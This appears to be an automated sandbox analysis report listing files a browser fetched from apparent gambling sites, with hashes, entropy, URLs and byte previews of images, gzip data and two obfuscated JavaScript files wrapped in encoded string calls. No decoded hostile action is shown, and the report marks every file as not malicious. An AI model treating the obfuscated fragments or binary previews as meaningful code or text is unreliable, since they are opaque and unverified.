                                                                                                                                                          Size (bytes):1380
                                                                                                                                                          Entropy (8bit):5.793775006412735
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VVlWw08EXYm/ZwDk5lOAO5HaNu9IRq0tjlIYtTm1qWG:VfWNIm2aIjHchjbm1k
                                                                                                                                                          MD5:04509D505B3AAFAFA9B91C94562074E8
                                                                                                                                                          SHA1:154785DE37CA0817F6449EF868436F7178E6E761
                                                                                                                                                          SHA-256:FF397F56C58A8E85397EADD86F51FE249DDD18C472255F40A9D0B6165ADCE251
                                                                                                                                                          SHA-512:77F5F7BB6E1848AD76ECF5FCE04227573D18B0813D2FC0299717EA5FE54F69BF442B0BC134F816C88617D3BA85ABC4D77E93BB693C34A5B1EC0D945F5BD45D5C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/inside.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgEYBdAGgG8AlAMWoGEAuAMwFc0YAXAS3UxFLQBKcgF9SAc0IAPNMzaceaPgNIdhAIhZIQAAiQcATl07qA3AHkwAKxCcAdABMQTLmhAAFAygggDHAJ6YaKTqAPqhIEgAsigOLAA2IOoUAG5Q8SwgDACEAAwigqZpBjpcALwcmOq5MBBM6oKkSGXkaFAAtlnqrkhcTskQXhBIDNjq3J0G6mQwKO0Q6CBoHCPks/MAciDAI6zs3LzCBiAcLAZoOhx2IJi4ABz4gnYcABZLmFdgrg5BCfEhMAAQgA1QENQQiMQOKAcKByfaKTBHE5nNDkLjtcSAqDaBhcRzOKAJK50dD6KDLOwwBxoAASKH0AGp1AB6DFQcQgAC0EBgbLQvScLOS8S4+gYogE2wAyi8UMAGLkmnKFXlSO0UF9ElsdiqcoQmgYYAx1OpIaRgDCYC8JQASLwsDhZPYKXj8ITkYqXCovMWmEB2NqdbJlNCBjogABkkY+vqQdiQKrK2QN2g4ABUMSAUI7MC6DkphFckEayupYNwUlwAuoyhU7Pac07w50APzqQZzFDqBhXRuOgNB/jFpN5MSvMXPLMGVsbFjtMC+WOTia+QQMADMAFZcoIIWJ1hABw4JYn5TEtSBsWg3AZ4a7C+RjqdzlUNZf1CGJ/GSzAAD5/tk352O+XDatsZ7AII0ZVHKnSfnWwG/tGwGivo2BIUaxD7qQMDHDCIAnvmiLCF6IA+mKAhlMA3zynY0oANIAJIbKYlTqIQACCVjiA0VR2MKjJoMy/JOFIdhWEgDTPG8SjEbwHoBrabhSBmxhwHm8gFki5ABmhHChnYPR9FeFK3tGYbGU4163kZTrtABkqDjKSaWQKJk2b4FlGe51lmb4gYQQBSoBr+ZRKQ6zZDqQAageBuryoZcUgDqkEASmBSZWIKAtMcaBOHe8mPmRFFIFRSl4SABEAKKJJ0yyqO
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (27136), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):27136
                                                                                                                                                          Entropy (8bit):5.695191668316121
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:DPnJVDMd9YAgKAQ3fgKAQ3fgKAQ3fhdV0:znJVDLxxmdV0
                                                                                                                                                          MD5:9CB313BAE3305AA77AFB3906885861B4
                                                                                                                                                          SHA1:F5682DC801F0C648236371600370ADAE9D70D4DD
                                                                                                                                                          SHA-256:6C4355A56536B5CB74199A2ECF522A9AECF36FEB6489A50B77F37533093F7771
                                                                                                                                                          SHA-512:99563A6B078875CC36FF8417462BEF8228412E1AF46922C70E08626168C7D49B5142399A8465A228FF831BA56D9DD483AA3E96B1024CC415094E10D1BEFF10F2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g3i6xDTyvG1SFn817t164NmZMmMF0oh762Gd0BApJfRrh5QI343qN7teOnvBVZNXosyoduupvopxNrfYmyFgfaVpr/li/h45VuCAtbkfNRQN3OJJNXzINTp6RAm9u/ABC7pxVm1syUyCIZA8NhgprcX2SlBwckFIkDEHOl8LDQ1xftGEi1Xh4PfoSv9kxKramLT4pe3onHJSjQ+nn5raiEw6z68LrrwO2flo3B+D7GwlbtYXP42+1IRuEJKIdW137/se9qtv8SpehS8sDI3PMhhOjiaLb3FraTmbpctNvwkCCkQesDdjqkjku9k9lV3icAZtjkX8XlYhpA6SpYdVWMzGqK0MJI2dSUThy22ZN9saPFG17dG057YKe6mozwl4A7BIKpf44V1cmVb8EH43xs7p6RFzAC8KUsJ97beLm3eHGNnW4JvQD1dDoNEsfzOwwlOxL71cptXDb3f+0wYOybwe0aPQbz1dKtOzRu/AWY900JIzCtVqmgQ7f4E9pwHSeU4Ru6RzFCIoN2c1UtHO70evXk3V+/y7hZhFHiU34QiTNdPFYSlEjpmaD8wwBm+oy/R7lFCM5vTvgVG9K8a/89xP0di85LFuhbZujinu+fBwEcFq7nrqusU46ZH4wY8TalLMaoBB3qsX0OgWcLtgwCruIZasaF3LfNc5e6FfErI4Tq4b7+eP3jm/8cJWB0UnN03/vv7NRbK6i5QgU+wgj58PY7sWq+2BugmR8smYuLZetTCQYRWHaYsghz9wQUPfUpgPQgz/iQysv+Ni4sUBxfTRblTl8zcUnruFQPDTumwMqpnqaaRORboWwmNlXi3Dkv4GA6q0ZzZ2GhutWmYCH+0PpivpGXaAhXgdy1eMg7gZLeUUN/PsYon/zGbAVVQU38wAGvPnV0l7w7gzMry+qu6xv+r/ILSt0hX1PYQhppfAhVIwI2D2Y3RnvIDFtS9
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 43 x 43, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5514
                                                                                                                                                          Entropy (8bit):7.895295275640609
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:k2/+tB/6EoJpiu+DBoGlQLqA7np9OAByl7CtdZiYf3BLlN6jVre202kwrkvHR9zi:T3zeaGuLJb54jVywk1vH/i
                                                                                                                                                          MD5:8CDE484BC3430C88F30AA81AB8EBB2AC
                                                                                                                                                          SHA1:97E4AF7815C4AA5265FA4C4701D50B5411D47695
                                                                                                                                                          SHA-256:F13BF512D616C61CC19743823B1EB8307AAD443CF44DFD582C57595E66106288
                                                                                                                                                          SHA-512:7C2A3F807F7C679305E3B9A74DFC7D8502103182663890032FA1B1B8E78FC9857C528F20838C2B726D19789120E45A3D2CBBCD14522A9F2E73CA66879A7517C4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...+...+......]q.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:7B5B11407B7A11E8A373F28E14CCE043" xmpMM:DocumentID="xmp.did:7B5B11417B7A11E8A373F28E14CCE043"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7B5B113E7B7A11E8A373F28E14CCE043" stRef:documentID="xmp.did:7B5B113F7B7A11E8A373F28E14CCE043"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!....IDATx.Y..].y>......y..x....`..f.....)....K..HQ..FQ.VmSE..FU.-m..H.D...$`..qlll.a.x......=..9....5.4..j..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):44327
                                                                                                                                                          Entropy (8bit):7.990407913990885
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:6TvSakVWGFUqCCFf16XFH+GYjCKzjgy0nfBEd9m694QqOvTWFP:699AJl1q2jg7nmdg695q8TWFP
                                                                                                                                                          MD5:147761B969F0C8D4E02032153C1CD966
                                                                                                                                                          SHA1:D85E7FA68051036C2FEEB71AF4E47FFB7647B62A
                                                                                                                                                          SHA-256:390D67C5603C292D02629EA992ABF84B1A927088881669D205D68FFCD34CB131
                                                                                                                                                          SHA-512:825B251E1A1ED65E9F271207FE7345E763EEF58CBBBA3CA2BDF302E675561A70ED83EDCF99A4E787C9E452AB52C8F1DEC08545A1666D3D3F48C77B13A68D6617
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:55AB19C8CDEB11E99917C5C3A935A3DF" xmpMM:DocumentID="xmp.did:55AB19C9CDEB11E99917C5C3A935A3DF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:55AB19C6CDEB11E99917C5C3A935A3DF" stRef:documentID="xmp.did:55AB19C7CDEB11E99917C5C3A935A3DF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.J......IDATx..}.|\..yuz.4.wc.`......@... .l....m.~...&@.!$.@......&.H.z.h....;...dR6....y3......O..q...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3884
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1716
                                                                                                                                                          Entropy (8bit):7.871115122825411
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:XmTvBpjCFLRPggadCcrhWjGno4rze2i43GjfL:2Tv6FLNggxIhWjC5f1/EL
                                                                                                                                                          MD5:88142B07EE7F59DCBEF6598841DCF43C
                                                                                                                                                          SHA1:7A7603E2CF745C34CAB4E0FEE59BB0B06F3CB961
                                                                                                                                                          SHA-256:F7F13248BFF492AFEA02F0022DB2E6B14772C75168860E335C6ADC387B85207E
                                                                                                                                                          SHA-512:DE25855229CB344478D977064018E0582F0E47AB216453F62047679923759940757CBE950324ABE02E5C7C91EAB836A5B0413D34A87E076C93FF2C3D1BAACEB7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/lt-cloud/stat.do?pv=ajax&pa=host.info&domain=wns732.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972853944231
                                                                                                                                                          Preview:..........|W.o.6...0tI.x.l..a..I..I.&..(.J.-6...TT..a....E...a.]s...Vl.k.../.HQ.eg..Xf.{|....G.p.E.\._.X..-....4..$...f.k6.f#h6p....k....AO.......F.f.....)...k.$..*.4.TB....|}.N^...I..ae..5k..ai...|.fG(.`..}jEk!1.>.K.b{....X..VN'{..V....\VB)...n....V..9A-.....};b(...LX.. .I...-B..r.O......jm5#4`. .|.G.."|N...o_...?....s.uu....e..........u.A...f.."w.....N..X......t......w.N.....m...RTV.g..G`.....:e;...........F...:.....s.q..0I............~.b...p!.\i.pe......i.AR.s.;E.....$t&..........{.MG...P.9.pD...<`..c..(.v...X`.{~>F.J.V.u.= bi@...x.x..H..t.D.p.....i...(..|Ld.p...D.!..;MJ_..H..q....6....E...sX..P..(.z.i...`6.lJ..$S..s..t2.. .s../....<...{.{$.k.0..rp.H)....XZx3;.,p<..DB.9m..x."8....6...D)L^.X....4aU...B.,.t.J...*..4L...v`.F#.x..q..yJ8.......a`1RD.......;.nSU.0.........L...*C."...b...p..h.fEJ..G.$..1..F..>.1*9..!..K(..(.E..]/....;.3.y9....\...e..P;.r...{.M...'dF.L9....A....y...Z(I..^.gT..8..,...?...)W..d.8.R./(\d...,......e...Km._....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (18632), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18632
                                                                                                                                                          Entropy (8bit):5.98982907585414
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:VuRs8jbUtpZjiZeg6Egf33db/h8a+DpBseCZJDkHN0I30QA3yj+Xn:4fU7ZKeg6Egf3by90DkH6Ipea+Xn
                                                                                                                                                          MD5:8AF7B35CAD66377E98B98D4261BB716D
                                                                                                                                                          SHA1:BD52F02009810E35FC621D7111D46F1A51E4435E
                                                                                                                                                          SHA-256:D4B93FA7F565BA13F42FAC331764CF7783550C11DF1624BB1779038FF30CF6CE
                                                                                                                                                          SHA-512:3BB40D0D221C1CD35D93E22DC32C80BE5D078393242798DFCAFAF98C8620FA828C7A497FE3F3D32EFADDD280B2B2CDB88158F6490C9BA88E400B387E8C811F3B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/manifest.js
                                                                                                                                                          Preview:a4vjeuue("IQMwrgdgxgLglgewgCgQSgN4DcCGAnAAgGcBeAdzggBMEyA6MgUwCMAHHKAawCkilWA3BWq0GLdl178S4aPCTIYAGgC2SgFaYQCPMlyFWSuErxKoJAAxKANiQDaAXQFQAPDDrXGEAOYwAFs4A1IFocCQwdlAOSox2cA4AZAnWdKxgRH7IsfF2Fg5oMXEOlgLauqwElAQqaADyzOqMsKl4CDBtAJ6sjHR+OES1ZBAACq3deDAddFA41tbIaqxoSah2rMUqa/mlOshESUSKqhpoAimePv4CaCkZcCAwyGhPAvfImmXI5hbOLuoeXl8ASgwTQeBIKAgdFI6ki2zwjBgYDwEAIeAAvgJ9AQYCQMOiYniAIwATlJAC4LJjZLBEKiUERMG8IkR8gikSicXZWXRGAAPVg6GBELH4AiMcLc4oYODkog2cnAIkxAVCojk/GY9nI1EIKXTWbzHr8wUTeWMGK81VmpQQAo9WzAKzG63C9FQiU0+QodDYMWkWIIJxvCwkMOM7WciCMMgEUYIFRwIiMZBeumoTAIJ7o05vCOInXEOwAJic2Nx0dj8cTydTkFpCmUdowAbsQfsTYcOYERBLxRgosIKhINCgYBUXnc3kRAFFPBOIMKAEIdAAqOG8ADkcBPkAAiPyMHBUPdoXLRdQjhBjhfuKAInAwRhzxi3/dEe9wVgwU8Cf6TboSD3J8+RgAB6dQcFwD88C/H8NGmPo8GTXE9zAGAQAAWgADj3BD+g6aASCdBD4AnBB0JIIli0YAAWW06GgJJ/hQgBBGAYFg5h0JTPcICQKBGDwqFoAKFi8HMKFWECPcwOLWiLAAViJAA2TCLAAZjAogYEfOAoAgogwL3QJkAwCxyWAhSVIAdkwygqH5TD1CIPCiUsmANOwmy7IcpyXLw4sPI0xTaKJezqH81ylA0jzsPiklMLaQ88AAYSQLCAqUWi4oSiLHL5ZzosUjyVIsJSkv8Rg0oyoq8JU0rysU
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 7140
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2080
                                                                                                                                                          Entropy (8bit):7.905443499860867
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:XH9rHUstijQRyIkubS8L2gXa7V0oCeQMCLCPHPn5dgkerCr:XDijQjhS8aHZ5xPHhdg8r
                                                                                                                                                          MD5:35F7D813CFB3B57C0BEE35A51BD7245B
                                                                                                                                                          SHA1:0619DFFCE879D19BC9FD88CF141DCE3450474529
                                                                                                                                                          SHA-256:DB320406CC54F6891F406745D0A93E5F46B79FC0E147CB684DAA3D5FFA6128FF
                                                                                                                                                          SHA-512:A546C15227234AC62A48C6A849ED4611629B999457F6CC01F01E169FAB35D3B81A10C4AA0A96F7B44C4BC0F99371A90D26C491D5F506F09F018929B8E1954116
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/js/countUp/countUp.js
                                                                                                                                                          Preview:.............r..]_q2......if..n...L.2.M^.?P$$1....-9..K.....X.....(.N..]xpn8w`.l0.|R^..j...{.[^r.N..v0x6...SP.X3...g.W.Q..X...T...%...`w9.eq..WS..u.a...y......._...cR...a......v..).K..KH.!.2;......7ci.M...e.]2.g...HR&c|_%u.`.)j....H.."..ck^P..R^f..9Q..I......g4....H2..).n4...^..#..SB...cg...r..;.b.y...CQ.mr.@.hk.~..T_[._.d..)3H.2eEw.IpOy.2....*/.X.....$..v...ZA..w$...P....].D.z...Z.J......&4.m.H.....K.-...7....z.c..\.c.n...G.7...|.)"..f.?.-..@.j......r..&..X.x.'.A.BF)f...r....?..Z.=....tX...U....~..8.Iu..w...U.`...iR..$..m..L.!Ga...%..7.b.h..N.h.8 P..._!o$y...d..Y....D....Q..,[.u.i.a.FNwT...-.'}...8...j...v/..[0U..+Y.~8...qV......s.%....{tq...}..o......Z..#.'.I[.[..dW..&p.J.,&........|...^W..y<....w..3.8....#V....CM.n..=IP.@..HHZLGk..RNNQ6x......NS........o...5.....#.........,..J.a.ju.....e...<q}.Z.~I.9.../.o..S..+,1]....U"%.x.3...f....S.......u..l..nW........h..P?......Y...l'w|.I.....0.R...~.a.`....%b....*......8B'..!..6tm.P..}.p..s....@.q./!.iM....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15093
                                                                                                                                                          Entropy (8bit):7.9524351565226485
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:TpDmpvlG/p2S5debP9KQ3nlAd8LLf2aM77qh1HAdysV:TFA0p2i8A8aaM7eh6dyS
                                                                                                                                                          MD5:46C57C51B8DF1740D25BBABBAADA22A5
                                                                                                                                                          SHA1:AFC3B7126B10FF529F254D0445532E57DF189479
                                                                                                                                                          SHA-256:ABB838D5A5AF338C8A792C810C027E8723AC2499A2D5FD3A69E8FEA5AF5A7101
                                                                                                                                                          SHA-512:F5FD8851D65813989D798F464F50FDBC20B76470189CF7DF26CC3B1B983EC0486CE39C4BD108D315EA02ADE80E307B4133B20BA3E9D211F04C6BCBFF7EC657A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/video/ag_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:6D4B3F328D5911E7A155C2C7373E56B1" xmpMM:InstanceID="xmp.iid:6D4B3F318D5911E7A155C2C7373E56B1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2022:11:18 23:58:55], baseline, precision 8, 334x81, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):39179
                                                                                                                                                          Entropy (8bit):7.597323531563319
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:d60VlYdPp0VlYgsb8IYydHOllflnf4mKK7JnOiVccGGal:1YqYgsnEtAqJNVvGhl
                                                                                                                                                          MD5:DE77A7E9A3982B06BD7F4305D9DE5747
                                                                                                                                                          SHA1:8FA997AA39F517E27007B03C8D55699169792406
                                                                                                                                                          SHA-256:1DB33D4300EAFB21A5F34D8B4A6D531A02B7E68FBD7D9CEAC75D604DE796214F
                                                                                                                                                          SHA-512:1A5C7DD6CE78CA1EEF19EE3DF4ACCAC8CA137DC30E54083B7B5937BE9F3A80127F1A37E1A9B2A11A3F9A223F0DE00FAD9EB1D67F05D63D9CF245C215F8F7C6FC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.....xExif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS6 (Windows).2022:11:18 23:58:55..........................N...........Q...........................................&.(.................................B.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................'...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...e......3*..ki.Hips....W..................O..+?.j..>.QN=O..f...^.......}..0F.B4 ...]...........6...K..._.....7.....y..`.I..J.*...U...x..%.. ..h..........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):19634
                                                                                                                                                          Entropy (8bit):7.963184945669312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:GQmYc2gqyEc+Ya0YgdNnx6g5LVW7DZ6/VUlOz0ouU0If1H9MwVlJyFR3ZqmeFliO:GQmYYqdc175dVx6gU7oZ7df1H9M5dFe3
                                                                                                                                                          MD5:1D8F3EE8FF9C810124A834D133E23195
                                                                                                                                                          SHA1:FC6D0D17A984C58E60CB1E7490FD8C730A972197
                                                                                                                                                          SHA-256:620E1BDF3C26704F4070CEED466065CFE6AE105D64F8EA11F1E619F1980E8BC6
                                                                                                                                                          SHA-512:CB8C7FBBF43568AD0FFC76B7CBB831CAFEED921B7DC3ED80960C7524B5DFA504F50E51588602EB84A4BBBABBD0A4ABFCA9608CB7374F929E400161B6BFBC8837
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9878D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9868D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):223398
                                                                                                                                                          Entropy (8bit):7.952362306931426
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:z5nBWC9WC9WC9WwbGhUHVkQbmIHVkQbmIHVkQbmIHVkE:VBRRRdC6HOUHOUHOUHOE
                                                                                                                                                          MD5:217C472C4A8EC503DB757AD9C9ED9E7A
                                                                                                                                                          SHA1:4C92C5C8D6BBDD16DA5BC7A68DE5520E2E3D5F45
                                                                                                                                                          SHA-256:B8ABECB757091DE38D83132B13D43E270F6E0A6D4F5E0307D9C34624FD8B54EC
                                                                                                                                                          SHA-512:D948021A098907796DCE8CD792DF038DD8D07A0638CC01FB39B641CE8450C097BE31E944111DAEB70FCEB4CDCA6F0811CC8F3C4513629DE70AE5D1F8CD91BB95
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89a..d.........[&....NKH..r....mm......lc...L......i...fE+.DB.....%*.x..9!...........................K6....."#..G..eX.kkk........mN...........Z.....q..7..M999...p..o...s.......j.vk..........K....lUF...}..o.H.rO.O/.h3.k.u.S.O...nG{{{..s...tdS.E.l.....p.3........L/.3......R.......X.....SF....A....Q._.pi....3+..F...d..b..!!!l...vl!C..N..PB..0.R0..........QJ....S..H6 ..r=.......0......$....".....#.3.{..#..v7.....3;...s.OQt.@BC....b..9;kJx....7.....O}gc.SvR.R...;& ...z....o...xug..>,.+...j..8%............[[\......dju........]j..=2&.%-.ZZ....m.....R......w&(0._.psy...)29..........p.....Hq9=|..ac1'4...)*"..................c.....R......s.......Z.....w3....G.............c..ksk.......7..=.;9.B.........~....vjx.....l............!..NETSCAPE2.0.....!.......,......d........H......*\....#J.H..E...j.... C..I...(S.\...0c..1#.8s.....@...J...6.*]...P.J.J...V.j....`..*...h.]...*..K...x.........L..X...+^......*,.....3k.L..@.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):20027
                                                                                                                                                          Entropy (8bit):7.963371497875305
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ITa1uA+fOWplgEF9zASXi/D/tvBmkNr8rG5mn3kMFen:ITaC5peEj01Q8r75CzFen
                                                                                                                                                          MD5:CFF93AD3AF5B98A472DCD451E0E50CAC
                                                                                                                                                          SHA1:2DF7BB9E726A9992EFBF691D69661D84F96AB5B9
                                                                                                                                                          SHA-256:CB9A7B35081FE5D28C85E543DC38AE3E8174FCD9A228094C4E29FE96C57BD6B9
                                                                                                                                                          SHA-512:3784694E01625E7A473962E4D71BC9947A94870B5E1041E93677A59B8FFD8D28C89792139CF7631561CD2C8C368B6148E9D64910C3673B413C9189E6B5FE4C03
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/video/sunbet_h.jpg
